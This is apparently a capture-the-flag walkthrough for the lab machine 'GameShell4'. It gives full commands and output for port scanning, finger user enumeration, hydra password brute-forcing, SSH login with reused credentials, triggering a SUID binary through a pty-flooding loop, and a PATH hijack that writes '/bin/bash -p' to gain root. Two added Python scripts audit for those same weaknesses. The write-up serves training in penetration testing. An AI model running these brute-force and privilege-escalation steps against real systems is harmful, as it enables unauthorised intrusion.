Mazesec_Gameshell4

Target source: QQ group 660930334

Difficulty: Easy

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:01 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00026s latency).
MAC Address: 08:00:27:8D:05:1E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.88
Host is up (0.00040s latency).
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.48 seconds

Target IP: 192.168.2.88

2. Port scanning

1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.88
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:01 +0800
Nmap scan report for 192.168.2.88
Host is up (0.00047s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
79/tcp open finger
80/tcp open http
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.26 seconds

Open ports: 22, 79, 80

2) Service, version and OS scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,79,80 192.168.2.88
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:02 +0800
Nmap scan report for 192.168.2.88
Host is up (0.00100s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp open finger OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at GameShell4 !\x0D
|
| 21:03:09 up 4 min, 0 users, load average: 0.01, 0.08, 0.04
| \x0D
|_No one logged on.\x0D
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Hidden Server
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: GameShell4; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.19 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.88
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-17 09:03 +0800
Nmap scan report for 192.168.2.88
Host is up (0.0013s latency).
All 100 scanned ports on 192.168.2.88 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:96:24:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 59.27 seconds

II. Web enumeration

1. Port 80

Visit port 80 in the browser.

2. Directory brute force

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.88
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: js,txt,bak,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 5431]
sudoku (Status: 401) [Size: 459]
server-status (Status: 403) [Size: 277]

A sudoku directory is found; accessing it requires a username and password (HTTP 401).

III. Finger user enumeration

Finger user-enumeration tool: https://github.com/dev-angelist/Finger-User-Enumeration. Its user-validation function needs to be modified as follows:

def check_valid_user(output):
    """Check whether the user is valid by analyzing the finger output."""
    # Original tool logic, replaced by the single string check below:
    #if "Login" in output and "Name" in output and "Super-User" in output:
    #    return True
    #if "ssh" in output:
    #    return True
    #return False

    # This target's fingerd answers "no such user." for unknown logins,
    # so that string alone separates valid from invalid names.
    if "no such user." in output:
        return False
    else:
        return True

Run the finger user enumeration against the target:

┌──(root㉿kali)-[~/miaosec]
└─# python3 finger_user_enumeration.py -t 192.168.2.88 -w ../Tool/techyou.txt

[+] User found: admin@192.168.2.25

[!] 1 Users Found

Querying the returned name directly confirms that admin is a valid account:

┌──(root㉿kali)-[~/miaosec]
└─# finger admin@192.168.2.88

Welcome to Linux version 4.19.0-27-amd64 at GameShell4 !

21:33:27 up 34 min, 0 users, load average: 0.75, 3.20, 2.60

Login: admin Name:
Directory: /home/admin Shell: /bin/bash
Never logged in.
No mail.
No Plan.

IV. Brute-forcing the HTTP Basic authentication

Use hydra against the /sudoku realm with the admin username:

┌──(root㉿kali)-[~/miaosec]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.88 http-get /sudoku
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-17 10:33:03
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.2.88:80/sudoku
[STATUS] 7659.00 tries/min, 7659 tries in 00:01h, 14336740 to do in 31:12h, 16 active
[STATUS] 7626.00 tries/min, 22878 tries in 00:03h, 14321521 to do in 31:18h, 16 active
[STATUS] 7585.29 tries/min, 53097 tries in 00:07h, 14291302 to do in 31:25h, 16 active
[80][http-get] host: 192.168.2.88 login: admin password: babylove3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-17 10:42:02

Logging in with the credentials reveals a sudoku puzzle, so solve it.

Solving it yields the string SUDOKUISMAGIC.

V. Getting a shell as admin

The credentials admin:babylove3 are reused for SSH and give a shell:

┌──(root㉿kali)-[~/miaosec]
└─# ssh admin@192.168.2.88
admin@GameShell4:~$ id
uid=1004(admin) gid=1004(admin) groups=1004(admin)

VI. Privilege escalation

1. Getting xcm

Listing /home shows two other users:

admin@GameShell4:~$ ls -la /home
total 20
drwxr-xr-x 5 root root 4096 Dec 1 07:42 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
drwx------ 2 admin admin 4096 Dec 1 08:13 admin
drwx------ 2 sdk sdk 4096 Dec 1 08:13 sdk
drwx------ 2 xcm xcm 4096 Dec 3 08:25 xcm

Trying the sudoku string as a password shows that sudokuismagic (the string in lowercase) switches to the xcm user:

admin@GameShell4:~$ su xcm
Password: sudokuismagic
xcm@GameShell4:/home/admin$ id
uid=1003(xcm) gid=1003(xcm) groups=1003(xcm)

2. Getting sdk

Check sudo -l:

xcm@GameShell4:/$ sudo -l
Matching Defaults entries for xcm on GameShell4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/usr/games

User xcm may run the following commands on GameShell4:
(sdk) NOPASSWD: /usr/local/bin/uv init *, /usr/local/bin/uv help *

Look for SUID files:

xcm@GameShell4:/$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/revive

/opt/revive has the SUID bit set and lives outside the package-managed directories.

Inspect the file:

xcm@GameShell4:/$ strings /opt/revive 
/lib64/ld-linux-x86-64.so.2
setuid
exit
fopen
unlink
chmod
fgets
strstr
fputc
fputs
fclose
stderr
fwrite
rename
geteuid
fprintf
__cxa_finalize
__libc_start_main
....

Its main logic: it checks whether /dev/pts/99 exists and, if it does, edits /etc/passwd to change the sdk user's login shell from /usr/games/cbonsai to /bin/bash, which makes an interactive shell as sdk possible.
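A defender-side check for the two traces this binary leaves behind: a SUID file outside the package-managed directories, and a login shell that differs from a known-good copy of /etc/passwd. This is an added Python example, not code from the original write-up or from the box; the passwd lines and the baseline are constructed from the users and uids shown on this page, and the SUID list is copied from the find output above.

```python
import os
import stat
import tempfile

# Constructed sample /etc/passwd content. The baseline is what a trusted
# snapshot would hold; the current copy is what /opt/revive leaves behind
# (only sdk's login shell differs, as described above).
PASSWD_BASELINE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "sdk:x:1002:1002::/home/sdk:/usr/games/cbonsai\n"
    "xcm:x:1003:1003::/home/xcm:/bin/bash\n"
    "admin:x:1004:1004::/home/admin:/bin/bash\n"
)
PASSWD_CURRENT = PASSWD_BASELINE.replace(
    "/home/sdk:/usr/games/cbonsai", "/home/sdk:/bin/bash"
)

# SUID list copied from the page's `find / -perm -4000` output.
SUID_FOUND = [
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/su", "/usr/bin/umount", "/usr/bin/pkexec",
    "/usr/bin/sudo", "/usr/bin/passwd",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/libexec/polkit-agent-helper-1", "/opt/revive",
]

# Prefixes under which package-managed SUID binaries are expected on Debian
# (an assumption for this example; adjust to the distribution's layout).
PACKAGE_SUID_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/",
                         "/usr/libexec/", "/bin/", "/sbin/")


def parse_passwd(text):
    """Map each login name to its (uid, shell) from passwd-format text."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # skip blank or malformed lines
            continue
        users[fields[0]] = (int(fields[2]), fields[6])
    return users


def shell_changes(baseline_text, current_text):
    """Return {user: (old_shell, new_shell)} for every user whose shell differs."""
    base = parse_passwd(baseline_text)
    cur = parse_passwd(current_text)
    changes = {}
    for user, (_, old_shell) in base.items():
        new_shell = cur.get(user, (None, None))[1]
        if new_shell != old_shell:
            changes[user] = (old_shell, new_shell)
    return changes


def unexpected_suid(paths, prefixes=PACKAGE_SUID_PREFIXES):
    """Return SUID paths that live outside the package-managed prefixes."""
    return [p for p in paths if not p.startswith(prefixes)]


def find_suid(root):
    """Walk `root` and return every regular file with the setuid bit set, sorted."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def demo():
    """Run both checks over the constructed data and a temp tree holding one SUID file."""
    tree = tempfile.mkdtemp()
    os.makedirs(os.path.join(tree, "opt"))
    suid_file = os.path.join(tree, "opt", "revive")
    with open(suid_file, "w") as fh:
        fh.write("placeholder, stands in for the binary\n")
    os.chmod(suid_file, 0o4755)          # setuid bit, like /opt/revive on the box
    with open(os.path.join(tree, "opt", "notes.txt"), "w") as fh:
        fh.write("plain file, must not be reported\n")
    return {
        "shell_changes": shell_changes(PASSWD_BASELINE, PASSWD_CURRENT),
        "unexpected_suid": unexpected_suid(SUID_FOUND),
        "suid_in_tree": find_suid(tree),
        "suid_file": suid_file,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real host the baseline would be a copy of /etc/passwd taken at build time and find_suid would be pointed at "/"; a user whose shell silently moves from a restricted program to /bin/bash, or a SUID file under /opt, are both worth an alert on their own.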

Make /dev/pts/99 exist: each background python3 process allocates one pseudo-terminal and holds it open for ten minutes, so starting 110 of them pushes the pts numbers past 99:

xcm@GameShell4:/tmp$ mkdir -p /tmp/holdptys
xcm@GameShell4:/tmp$ for i in $(seq 1 110); do python3 -c 'import os,pty,time; m,s=pty.openpty(); print(os.ttyname(s)); time.sleep(600)'>/tmp/holdptys/$i.out 2>/tmp/holdptys/$i.err & done

Running the binary now performs the modification:

xcm@GameShell4:/$ /opt/revive 
[+] /dev/pts/99 found! Updating sdk shell...
[+] Success! sdk shell updated to /bin/bash

Escalate to sdk through the permitted sudo rule:

xcm@GameShell4:/$ sudo -u sdk  /usr/local/bin/uv help help
sdk@GameShell4:/$ id
uid=1002(sdk) gid=1002(sdk) groups=1002(sdk)

3. Getting root

Check sudo -l:

sdk@GameShell4:/$ sudo -l
Matching Defaults entries for sdk on GameShell4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/usr/games

User sdk may run the following commands on GameShell4:
(ALL) NOPASSWD: /usr/local/bin/livescreen

Inspect the livescreen script:

sdk@GameShell4:/$ strings /usr/local/bin/livescreen
#!/bin/bash
cbonsai -i -l

Check where cbonsai resolves and what PATH contains:

sdk@GameShell4:/$ which cbonsai
/usr/games/cbonsai

sdk@GameShell4:/$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/games

/usr/local/bin is also writable (the trailing + on the mode means an ACL grants permissions beyond the listed bits):

sdk@GameShell4:/$ ls -ld /usr/local/bin
drwxrwxr-x+ 2 root root 4096 Dec 2 08:29 /usr/local/bin

Because livescreen calls cbonsai by bare name and /usr/local/bin comes before /usr/games in PATH, a PATH hijack is straightforward:

sdk@GameShell4:/$ echo '/bin/bash -p' > /usr/local/bin/cbonsai
sdk@GameShell4:/$ chmod +x /usr/local/bin/cbonsai
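The root step works because a sudo-permitted wrapper resolves a command through PATH and a directory searched earlier than the real binary is writable. The following is an added Python example (not code from the write-up or the box) that audits a wrapper script for this: it lists bare command names, finds which directories on the search path are group- or world-writable and searched before the command resolves, and emits a hardened wrapper with the absolute path and a pinned PATH. The wrapper text is the livescreen script shown above; the directory layout is rebuilt in a temporary tree, with the 0775 mode mirroring the listing (ACL entries are not visible through stat and would need getfacl).

```python
import os
import shlex
import stat
import tempfile

# Constructed sample: the wrapper exactly as the `strings` output shows it.
LIVESCREEN = "#!/bin/bash\ncbonsai -i -l\n"

# Shell keywords that appear in command position but are not executables.
SHELL_KEYWORDS = {"if", "then", "else", "fi", "for", "do", "done",
                  "while", "exit", "return", "export", "set"}


def unqualified_commands(script_text):
    """Return command words in a shell script that are not absolute paths.

    Each non-empty, non-comment line is tokenised and its first word taken as
    the command; pipelines are not split, so this is a first-pass audit only.
    """
    found = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        words = shlex.split(line)
        if not words:
            continue
        cmd = words[0]
        if "=" in cmd or cmd in SHELL_KEYWORDS:
            continue
        if not cmd.startswith("/") and cmd not in found:
            found.append(cmd)
    return found


def group_or_world_writable(path):
    """True if the mode bits grant write to group or others (ACLs are not seen here)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def hijack_exposure(path_dirs, command):
    """Resolve `command` along `path_dirs` and collect writable dirs searched before it.

    Returns (resolved_path_or_None, [writable_dirs_searched_first]).
    """
    writable_before = []
    for d in path_dirs:
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate, writable_before
        if os.path.isdir(d) and group_or_world_writable(d):
            writable_before.append(d)
    return None, writable_before


def harden_wrapper(script_text, known_binaries):
    """Rewrite bare commands to absolute paths and pin PATH right after the shebang."""
    out = []
    for line in script_text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            words = stripped.split(None, 1)
            if words[0] in known_binaries:
                rest = " " + words[1] if len(words) > 1 else ""
                line = known_binaries[words[0]] + rest
        out.append(line)
    if out and out[0].startswith("#!"):
        out.insert(1, "export PATH=/usr/sbin:/usr/bin:/sbin:/bin")
    return "\n".join(out) + "\n"


def demo():
    """Rebuild the page's layout in a temp tree and run the three checks."""
    root = tempfile.mkdtemp()
    local_bin = os.path.join(root, "usr", "local", "bin")
    games = os.path.join(root, "usr", "games")
    os.makedirs(local_bin)
    os.makedirs(games)
    os.chmod(local_bin, 0o775)               # drwxrwxr-x as in the listing
    real = os.path.join(games, "cbonsai")
    with open(real, "w") as fh:
        fh.write("#!/bin/sh\n# stand-in for the real cbonsai binary\n")
    os.chmod(real, 0o755)
    resolved, writable = hijack_exposure([local_bin, games], "cbonsai")
    return {
        "bare_commands": unqualified_commands(LIVESCREEN),
        "resolved": resolved,
        "writable_before": writable,
        "hardened": harden_wrapper(LIVESCREEN, {"cbonsai": "/usr/games/cbonsai"}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, repr(value))
```

The fix the audit points at is the hardened wrapper: an absolute path for cbonsai and a PATH that contains no directory the invoking user can write to, together with removing the write ACL from /usr/local/bin.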

Running livescreen through sudo now gives root:

sdk@GameShell4:/$ sudo /usr/local/bin/livescreen
root@GameShell4:/# id
uid=0(root) gid=0(root) groups=0(root)

VII. Flags

root@GameShell4:/# cat /root/root.txt /home/xcm/user.txt 
flag{root-983b0f2b5412aadd94ed08f249355686}
flag{user-602d9cd809f3b29eae8bc042bdf6c1ca}

Source: http://miao-sec.github.io/Maze-sec/Mazesec-Gameshell4/
Author: Miao
Published: 17 March 2026
License: BY-MIAO